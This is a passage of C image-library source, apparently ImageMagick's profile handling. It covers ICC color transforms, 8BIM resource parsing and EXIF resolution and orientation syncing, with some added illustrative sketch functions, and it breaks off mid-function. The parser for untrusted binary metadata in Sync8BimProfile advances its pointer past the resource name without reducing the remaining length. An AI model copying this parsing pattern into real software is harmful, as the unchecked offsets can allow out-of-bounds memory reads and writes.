(cmsUInt32Number) GetStringInfoLength(icc_profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowProfileException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
}
switch (cmsGetColorSpace(source_profile))
{
case cmsSigCmykData:
{
source_colorspace=CMYKColorspace;
source_type=(cmsUInt32Number) TYPE_CMYK_16;
source_channels=4;
break;
}
case cmsSigGrayData:
{
source_colorspace=GRAYColorspace;
source_type=(cmsUInt32Number) TYPE_GRAY_16;
source_channels=1;
break;
}
case cmsSigLabData:
{
source_colorspace=LabColorspace;
source_type=(cmsUInt32Number) TYPE_Lab_16;
source_channels=3;
break;
}
case cmsSigLuvData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YUV_16;
source_channels=3;
break;
}
case cmsSigRgbData:
{
source_colorspace=sRGBColorspace;
source_type=(cmsUInt32Number) TYPE_RGB_16;
source_channels=3;
break;
}
case cmsSigXYZData:
{
source_colorspace=XYZColorspace;
source_type=(cmsUInt32Number) TYPE_XYZ_16;
source_channels=3;
break;
}
case cmsSigYCbCrData:
{
source_colorspace=YCbCrColorspace;
source_type=(cmsUInt32Number) TYPE_YCbCr_16;
source_channels=3;
break;
}
default:
{
source_colorspace=UndefinedColorspace;
source_type=(cmsUInt32Number) TYPE_RGB_16;
source_channels=3;
break;
}
}
signature=cmsGetPCS(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
signature=cmsGetColorSpace(target_profile);
switch (signature)
{
case cmsSigCmykData:
{
target_colorspace=CMYKColorspace;
target_type=(cmsUInt32Number) TYPE_CMYK_16;
target_channels=4;
break;
}
case cmsSigLabData:
{
target_colorspace=LabColorspace;
target_type=(cmsUInt32Number) TYPE_Lab_16;
target_channels=3;
break;
}
case cmsSigGrayData:
{
target_colorspace=GRAYColorspace;
target_type=(cmsUInt32Number) TYPE_GRAY_16;
target_channels=1;
break;
}
case cmsSigLuvData:
{
target_colorspace=YUVColorspace;
target_type=(cmsUInt32Number) TYPE_YUV_16;
target_channels=3;
break;
}
case cmsSigRgbData:
{
target_colorspace=sRGBColorspace;
target_type=(cmsUInt32Number) TYPE_RGB_16;
target_channels=3;
break;
}
case cmsSigXYZData:
{
target_colorspace=XYZColorspace;
target_type=(cmsUInt32Number) TYPE_XYZ_16;
target_channels=3;
break;
}
case cmsSigYCbCrData:
{
target_colorspace=YCbCrColorspace;
target_type=(cmsUInt32Number) TYPE_YCbCr_16;
target_channels=3;
break;
}
default:
{
target_colorspace=UndefinedColorspace;
target_type=(cmsUInt32Number) TYPE_RGB_16;
target_channels=3;
break;
}
}
if ((source_colorspace == UndefinedColorspace) ||
(target_colorspace == UndefinedColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == GRAYColorspace) &&
(SetImageGray(image,exception) == MagickFalse))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == CMYKColorspace) &&
(image->colorspace != CMYKColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == XYZColorspace) &&
(image->colorspace != XYZColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == YCbCrColorspace) &&
(image->colorspace != YCbCrColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace != CMYKColorspace) &&
(source_colorspace != LabColorspace) &&
(source_colorspace != XYZColorspace) &&
(source_colorspace != YCbCrColorspace) &&
(IssRGBCompatibleColorspace(image->colorspace) == MagickFalse))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
switch (image->rendering_intent)
{
case AbsoluteIntent: intent=INTENT_ABSOLUTE_COLORIMETRIC; break;
case PerceptualIntent: intent=INTENT_PERCEPTUAL; break;
case RelativeIntent: intent=INTENT_RELATIVE_COLORIMETRIC; break;
case SaturationIntent: intent=INTENT_SATURATION; break;
default: intent=INTENT_PERCEPTUAL; break;
}
flags=cmsFLAGS_HIGHRESPRECALC;
#if defined(cmsFLAGS_BLACKPOINTCOMPENSATION)
if (image->black_point_compensation != MagickFalse)
flags|=cmsFLAGS_BLACKPOINTCOMPENSATION;
#endif
transform=AcquireTransformThreadSet(image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform == (cmsHTRANSFORM *) NULL)
ThrowProfileException(ImageError,"UnableToCreateColorTransform",
name);
/*
Transform image as dictated by the source & target image profiles.
*/
source_pixels=AcquirePixelThreadSet(image->columns,source_channels);
target_pixels=AcquirePixelThreadSet(image->columns,target_channels);
if ((source_pixels == (unsigned short **) NULL) ||
(target_pixels == (unsigned short **) NULL))
{
transform=DestroyTransformThreadSet(transform);
ThrowProfileException(ResourceLimitError,
"MemoryAllocationFailed",image->filename);
}
if (SetImageStorageClass(image,DirectClass,exception) == MagickFalse)
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if (source_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
return(MagickFalse);
}
if (target_colorspace == CMYKColorspace)
(void) SetImageColorspace(image,target_colorspace,exception);
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
magick_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
MagickBooleanType
sync;
register ssize_t
x;
register Quantum
*magick_restrict q;
register unsigned short
*p;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
p=source_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
*p++=ScaleQuantumToShort(GetPixelRed(image,q));
if (source_channels > 1)
{
*p++=ScaleQuantumToShort(GetPixelGreen(image,q));
*p++=ScaleQuantumToShort(GetPixelBlue(image,q));
}
if (source_channels > 3)
*p++=ScaleQuantumToShort(GetPixelBlack(image,q));
q+=GetPixelChannels(image);
}
cmsDoTransform(transform[id],source_pixels[id],target_pixels[id],
(unsigned int) image->columns);
p=target_pixels[id];
q-=GetPixelChannels(image)*image->columns;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (target_channels == 1)
SetPixelGray(image,ScaleShortToQuantum(*p),q);
else
SetPixelRed(image,ScaleShortToQuantum(*p),q);
p++;
if (target_channels > 1)
{
SetPixelGreen(image,ScaleShortToQuantum(*p),q);
p++;
SetPixelBlue(image,ScaleShortToQuantum(*p),q);
p++;
}
if (target_channels > 3)
{
SetPixelBlack(image,ScaleShortToQuantum(*p),q);
p++;
}
q+=GetPixelChannels(image);
}
sync=SyncCacheViewAuthenticPixels(image_view,exception);
if (sync == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_ProfileImage)
#endif
proceed=SetImageProgress(image,ProfileImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
(void) SetImageColorspace(image,target_colorspace,exception);
switch (signature)
{
case cmsSigRgbData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
TrueColorType : TrueColorAlphaType;
break;
}
case cmsSigCmykData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
ColorSeparationType : ColorSeparationAlphaType;
break;
}
case cmsSigGrayData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
GrayscaleType : GrayscaleAlphaType;
break;
}
default:
break;
}
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if ((status != MagickFalse) &&
(cmsGetDeviceClass(source_profile) != cmsSigLinkClass))
status=SetImageProfile(image,name,profile,exception);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
}
(void) cmsCloseProfile(source_profile);
}
#endif
}
profile=DestroyStringInfo(profile);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e m o v e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RemoveImageProfile() removes a named profile from the image and returns its
% value.
%
% The format of the RemoveImageProfile method is:
%
% void *RemoveImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport StringInfo *RemoveImageProfile(Image *image,const char *name)
{
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
profile=(StringInfo *) RemoveNodeFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e s e t P r o f i l e I t e r a t o r %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ResetImageProfileIterator() resets the image profile iterator. Use it in
% conjunction with GetNextImageProfile() to iterate over all the profiles
% associated with an image.
%
% The format of the ResetImageProfileIterator method is:
%
% ResetImageProfileIterator(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
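/*
  Illustrative iteration sketch (not part of the library proper): walk every
  profile attached to an image.  The "image" variable is assumed to be a
  valid Image pointer.

    char *name;

    ResetImageProfileIterator(image);
    for (name=GetNextImageProfile(image); name != (char *) NULL; )
    {
      const StringInfo *profile=GetImageProfile(image,name);
      (void) fprintf(stdout,"%s: %.20g bytes\n",name,(double)
        GetStringInfoLength(profile));
      name=GetNextImageProfile(image);
    }
*/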
MagickExport void ResetImageProfileIterator(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return;
ResetSplayTreeIterator((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageProfile() adds a named profile to the image. If a profile with the
% same name already exists, it is replaced. This method differs from the
% ProfileImage() method in that it does not apply CMS color profiles.
%
% The format of the SetImageProfile method is:
%
% MagickBooleanType SetImageProfile(Image *image,const char *name,
% const StringInfo *profile,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name, for example icc, exif, and 8bim (8bim is the
% Photoshop wrapper for iptc profiles).
%
% o profile: A StringInfo structure that contains the named profile.
%
% o exception: return any errors or warnings in this structure.
%
*/
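/*
  Illustrative sketch (not part of the library proper): attach a raw EXIF
  payload without invoking any color transform.  The "blob" and "length"
  variables are hypothetical.

    StringInfo *profile=BlobToStringInfo(blob,length);
    if (profile != (StringInfo *) NULL)
      {
        (void) SetImageProfile(image,"exif",profile,exception);
        profile=DestroyStringInfo(profile);
      }
*/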
static void *DestroyProfile(void *profile)
{
return((void *) DestroyStringInfo((StringInfo *) profile));
}
static inline const unsigned char *ReadResourceByte(const unsigned char *p,
unsigned char *quantum)
{
*quantum=(*p++);
return(p);
}
static inline const unsigned char *ReadResourceLong(const unsigned char *p,
unsigned int *quantum)
{
*quantum=(unsigned int) (*p++) << 24;
*quantum|=(unsigned int) (*p++) << 16;
*quantum|=(unsigned int) (*p++) << 8;
*quantum|=(unsigned int) (*p++) << 0;
return(p);
}
static inline const unsigned char *ReadResourceShort(const unsigned char *p,
unsigned short *quantum)
{
*quantum=(unsigned short) (*p++) << 8;
*quantum|=(unsigned short) (*p++);
return(p);
}
static inline void WriteResourceLong(unsigned char *p,
const unsigned int quantum)
{
unsigned char
buffer[4];
buffer[0]=(unsigned char) (quantum >> 24);
buffer[1]=(unsigned char) (quantum >> 16);
buffer[2]=(unsigned char) (quantum >> 8);
buffer[3]=(unsigned char) quantum;
(void) CopyMagickMemory(p,buffer,4);
}
static void WriteTo8BimProfile(Image *image,const char *name,
const StringInfo *profile)
{
const unsigned char
*datum,
*q;
register const unsigned char
*p;
size_t
length;
StringInfo
*profile_8bim;
ssize_t
count;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id,
profile_id;
if (LocaleCompare(name,"icc") == 0)
profile_id=0x040f;
else
if (LocaleCompare(name,"iptc") == 0)
profile_id=0x0404;
else
if (LocaleCompare(name,"xmp") == 0)
profile_id=0x0424;
else
return;
profile_8bim=(StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,"8bim");
if (profile_8bim == (StringInfo *) NULL)
return;
datum=GetStringInfoDatum(profile_8bim);
length=GetStringInfoLength(profile_8bim);
for (p=datum; p < (datum+length-16); )
{
q=p;
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((count & 0x01) != 0)
count++;
if ((count < 0) || (p > (datum+length-count)) ||
(count > (ssize_t) length))
break;
if (id != profile_id)
p+=count;
else
{
size_t
extent,
offset;
ssize_t
extract_count;
StringInfo
*extract_profile;
extract_count=0;
extent=(datum+length)-(p+count);
if (profile == (StringInfo *) NULL)
{
offset=(q-datum);
extract_profile=AcquireStringInfo(offset+extent);
(void) CopyMagickMemory(extract_profile->datum,datum,offset);
}
else
{
offset=(p-datum);
extract_count=profile->length;
if ((extract_count & 0x01) != 0)
extract_count++;
extract_profile=AcquireStringInfo(offset+extract_count+extent);
(void) CopyMagickMemory(extract_profile->datum,datum,offset-4);
WriteResourceLong(extract_profile->datum+offset-4,
(unsigned int)profile->length);
(void) CopyMagickMemory(extract_profile->datum+offset,
profile->datum,profile->length);
}
(void) CopyMagickMemory(extract_profile->datum+offset+extract_count,
p+count,extent);
(void) AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString("8bim"),CloneStringInfo(extract_profile));
extract_profile=DestroyStringInfo(extract_profile);
break;
}
}
}
static void GetProfilesFromResourceBlock(Image *image,
const StringInfo *resource_block,ExceptionInfo *exception)
{
const unsigned char
*datum;
register const unsigned char
*p;
size_t
length;
ssize_t
count;
StringInfo
*profile;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id;
datum=GetStringInfoDatum(resource_block);
length=GetStringInfoLength(resource_block);
for (p=datum; p < (datum+length-16); )
{
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((p > (datum+length-count)) || (count > (ssize_t) length) ||
(count < 0))
break;
switch (id)
{
case 0x03ed:
{
unsigned int
resolution;
unsigned short
units;
/*
Resolution.
*/
p=ReadResourceLong(p,&resolution);
image->resolution.x=((double) resolution)/65536.0;
p=ReadResourceShort(p,&units)+2;
p=ReadResourceLong(p,&resolution)+4;
image->resolution.y=((double) resolution)/65536.0;
/*
Values are always stored as pixels per inch.
*/
if ((ResolutionType) units != PixelsPerCentimeterResolution)
image->units=PixelsPerInchResolution;
else
{
image->units=PixelsPerCentimeterResolution;
image->resolution.x/=2.54;
image->resolution.y/=2.54;
}
break;
}
case 0x0404:
{
/*
IPTC Profile
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"iptc",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x040c:
{
/*
Thumbnail.
*/
p+=count;
break;
}
case 0x040f:
{
/*
ICC Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"icc",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0422:
{
/*
EXIF Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"exif",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0424:
{
/*
XMP Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"xmp",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
default:
{
p+=count;
break;
}
}
if ((count & 0x01) != 0)
p++;
}
}
static MagickBooleanType SetImageProfileInternal(Image *image,const char *name,
const StringInfo *profile,const MagickBooleanType recursive,
ExceptionInfo *exception)
{
char
key[MagickPathExtent],
property[MagickPathExtent];
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
image->profiles=NewSplayTree(CompareSplayTreeString,RelinquishMagickMemory,
DestroyProfile);
(void) CopyMagickString(key,name,MagickPathExtent);
LocaleLower(key);
status=AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString(key),CloneStringInfo(profile));
if (status != MagickFalse)
{
if (LocaleCompare(name,"8bim") == 0)
GetProfilesFromResourceBlock(image,profile,exception);
else if (recursive == MagickFalse)
WriteTo8BimProfile(image,name,profile);
}
/*
Inject profile into image properties.
*/
(void) FormatLocaleString(property,MagickPathExtent,"%s:*",name);
(void) GetImageProperty(image,property,exception);
return(status);
}
MagickExport MagickBooleanType SetImageProfile(Image *image,const char *name,
const StringInfo *profile,ExceptionInfo *exception)
{
return(SetImageProfileInternal(image,name,profile,MagickFalse,exception));
}
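/*
  Illustrative usage sketch, not part of the original coder: attach a raw
  ICC payload to an image as a named profile.  The buffer and length
  parameters are hypothetical; only routines already used in this file are
  called.  SetImageProfile() clones the StringInfo, so the caller releases
  its own copy afterwards.
*/
static MagickBooleanType AttachIccProfileSketch(Image *image,
  const unsigned char *icc_payload,const size_t icc_length,
  ExceptionInfo *exception)
{
  MagickBooleanType
    status;

  StringInfo
    *profile;

  profile=AcquireStringInfo(icc_length);    /* allocate the profile container */
  SetStringInfoDatum(profile,icc_payload);  /* copy the raw ICC bytes into it */
  status=SetImageProfile(image,"icc",profile,exception);
  profile=DestroyStringInfo(profile);       /* the image keeps its own clone */
  return(status);
}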
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S y n c I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SyncImageProfiles() synchronizes image properties with the image profiles.
% Currently only the resolution stored in the 8BIM and EXIF profiles and the
% EXIF orientation are updated.
%
% The format of the SyncImageProfiles method is:
%
% MagickBooleanType SyncImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
static inline int ReadProfileByte(unsigned char **p,size_t *length)
{
int
c;
if (*length < 1)
return(EOF);
c=(int) (*(*p)++);
(*length)--;
return(c);
}
static inline signed short ReadProfileShort(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned short
value;
if (endian == LSBEndian)
{
value=(unsigned short) buffer[1] << 8;
value|=(unsigned short) buffer[0];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
value=(unsigned short) buffer[0] << 8;
value|=(unsigned short) buffer[1];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileLong(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned int
value;
if (endian == LSBEndian)
{
value=(unsigned int) buffer[3] << 24;
value|=(unsigned int) buffer[2] << 16;
value|=(unsigned int) buffer[1] << 8;
value|=(unsigned int) buffer[0];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
value=(unsigned int) buffer[0] << 24;
value|=(unsigned int) buffer[1] << 16;
value|=(unsigned int) buffer[2] << 8;
value|=(unsigned int) buffer[3];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileMSBLong(unsigned char **p,size_t *length)
{
signed int
value;
if (*length < 4)
return(0);
value=ReadProfileLong(MSBEndian,*p);
(*length)-=4;
*p+=4;
return(value);
}
static inline signed short ReadProfileMSBShort(unsigned char **p,
size_t *length)
{
signed short
value;
if (*length < 2)
return(0);
value=ReadProfileShort(MSBEndian,*p);
(*length)-=2;
*p+=2;
return(value);
}
static inline void WriteProfileLong(const EndianType endian,
const size_t value,unsigned char *p)
{
unsigned char
buffer[4];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
buffer[2]=(unsigned char) (value >> 16);
buffer[3]=(unsigned char) (value >> 24);
(void) CopyMagickMemory(p,buffer,4);
return;
}
buffer[0]=(unsigned char) (value >> 24);
buffer[1]=(unsigned char) (value >> 16);
buffer[2]=(unsigned char) (value >> 8);
buffer[3]=(unsigned char) value;
(void) CopyMagickMemory(p,buffer,4);
}
static void WriteProfileShort(const EndianType endian,
const unsigned short value,unsigned char *p)
{
unsigned char
buffer[2];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
(void) CopyMagickMemory(p,buffer,2);
return;
}
buffer[0]=(unsigned char) (value >> 8);
buffer[1]=(unsigned char) value;
(void) CopyMagickMemory(p,buffer,2);
}
static MagickBooleanType Sync8BimProfile(Image *image,StringInfo *profile)
{
size_t
length;
ssize_t
count;
unsigned char
*p;
unsigned short
id;
length=GetStringInfoLength(profile);
p=GetStringInfoDatum(profile);
while (length != 0)
{
if (ReadProfileByte(&p,&length) != 0x38)
continue;
if (ReadProfileByte(&p,&length) != 0x42)
continue;
if (ReadProfileByte(&p,&length) != 0x49)
continue;
if (ReadProfileByte(&p,&length) != 0x4D)
continue;
if (length < 7)
return(MagickFalse);
id=ReadProfileMSBShort(&p,&length);
count=(ssize_t) ReadProfileByte(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
p+=count;
if ((*p & 0x01) == 0)
(void) ReadProfileByte(&p,&length);
count=(ssize_t) ReadProfileMSBLong(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
if ((id == 0x3ED) && (count == 16))
{
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.x*2.54*
65536.0),p);
else
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.x*
65536.0),p);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+4);
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.y*2.54*
65536.0),p+8);
else
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.y*
65536.0),p+8);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+12);
}
p+=count;
length-=count;
}
return(MagickTrue);
}
MagickBooleanType SyncExifProfile(Image *image,StringInfo *profile)
{
#define MaxDirectoryStack 16
#define EXIF_DELIMITER "\n"
#define EXIF_NUM_FORMATS 12
#define TAG_EXIF_OFFSET 0x8769
#define TAG_INTEROP_OFFSET 0xa005
typedef struct _DirectoryInfo
{
unsigned char
*directory;
size_t
entry;
} DirectoryInfo;
DirectoryInfo
directory_stack[MaxDirectoryStack];
EndianType
endian;
size_t
entry,
length,
number_entries;
ssize_t
id,
level,
offset;
static int
format_bytes[] = {0, 1, 1, 2, 4, 8, 1, 1, 2, 4, 8, 4, 8};
unsigned char
*directory,
*exif;
/*
Set EXIF resolution tag.
*/
length=GetStringInfoLength(profile);
exif=GetStringInfoDatum(profile);
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
if ((id != 0x4949) && (id != 0x4D4D))
{
while (length != 0)
{
if (ReadProfileByte(&exif,&length) != 0x45)
continue;
if (ReadProfileByte(&exif,&length) != 0x78)
continue;
if (ReadProfileByte(&exif,&length) != 0x69)
continue;
if (ReadProfileByte(&exif,&length) != 0x66)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
break;
}
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
}
endian=LSBEndian;
if (id == 0x4949)
endian=LSBEndian;
else
if (id == 0x4D4D)
endian=MSBEndian;
else
return(MagickFalse);
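/*
  A TIFF header is the byte-order mark ("II" or "MM"), the magic number
  0x002A, and then the 32-bit offset of the first IFD.
*/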
if (ReadProfileShort(endian,exif+2) != 0x002a)
return(MagickFalse);
/*
This is the offset to the first IFD.
*/
offset=(ssize_t) ReadProfileLong(endian,exif+4);
if ((offset < 0) || (size_t) offset >= length)
return(MagickFalse);
directory=exif+offset;
level=0;
entry=0;
do
{
if (level > 0)
{
level--;
directory=directory_stack[level].directory;
entry=directory_stack[level].entry;
}
if ((directory < exif) || (directory > (exif+length-2)))
break;
/*
Determine how many entries there are in the current IFD.
*/
number_entries=ReadProfileShort(endian,directory);
for ( ; entry < number_entries; entry++)
{
int
components;
register unsigned char
*p,
*q;
size_t
number_bytes;
ssize_t
format,
tag_value;
q=(unsigned char *) (directory+2+(12*entry));
if (q > (exif+length-12))
break; /* corrupt EXIF */
tag_value=(ssize_t) ReadProfileShort(endian,q);
format=(ssize_t) ReadProfileShort(endian,q+2);
if ((format < 0) || ((format-1) >= EXIF_NUM_FORMATS))
  break;  /* corrupt EXIF: guard the format_bytes[] index */
components=(ssize_t) ReadProfileLong(endian,q+4);
if (components < 0)
break; /* corrupt EXIF */
number_bytes=(size_t) components*format_bytes[format];
if ((ssize_t) number_bytes < components)
break; /* prevent overflow */
if (number_bytes <= 4)
p=q+8;
else
{
/*
The directory entry contains an offset.
*/
offset=(ssize_t) ReadProfileLong(endian,q+8);
if ((size_t) (offset+number_bytes) > length)
continue;
if (~length < number_bytes)
continue; /* prevent overflow */
p=(unsigned char *) (exif+offset);
}
switch (tag_value)
{
case 0x011a:
{
(void) WriteProfileLong(endian,(size_t) (image->resolution.x+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x011b:
{
(void) WriteProfileLong(endian,(size_t) (image->resolution.y+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x0112:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) image->orientation,p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) image->orientation,
p);
break;
}
case 0x0128:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) (image->units+1),p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) (image->units+1),p);
break;
}
default:
break;
}
if ((tag_value == TAG_EXIF_OFFSET) || (tag_value == TAG_INTEROP_OFFSET))
{
offset=(ssize_t) ReadProfileLong(endian,p);
if (((size_t) offset < length) && (level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=directory;
entry++;
directory_stack[level].entry=entry;
level++;
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
if ((directory+2+(12*number_entries)) > (exif+length))
break;
offset=(ssize_t) ReadProfileLong(endian,directory+2+(12*
number_entries));
if ((offset != 0) && ((size_t) offset < length) &&
(level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
}
}
break;
}
}
} while (level > 0);
return(MagickTrue);
}
MagickPrivate MagickBooleanType SyncImageProfiles(Image *image)
{
MagickBooleanType
status;
StringInfo
*profile;
status=MagickTrue;
profile=(StringInfo *) GetImageProfile(image,"8BIM");
if (profile != (StringInfo *) NULL)
if (Sync8BimProfile(image,profile) == MagickFalse)
status=MagickFalse;
profile=(StringInfo *) GetImageProfile(image,"EXIF");
if (profile != (StringInfo *) NULL)
if (SyncExifProfile(image,profile) == MagickFalse)
status=MagickFalse;
return(status);
}
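/*
  Illustrative sketch, not part of the original source: a coder that is about
  to serialize the profiles would typically update the in-memory fields and
  then call SyncImageProfiles() so the embedded 8BIM and EXIF records agree
  with them.  The 300 DPI value below is hypothetical.
*/
static MagickBooleanType SyncProfilesBeforeWriteSketch(Image *image)
{
  image->resolution.x=300.0;             /* hypothetical new density */
  image->resolution.y=300.0;
  image->units=PixelsPerInchResolution;
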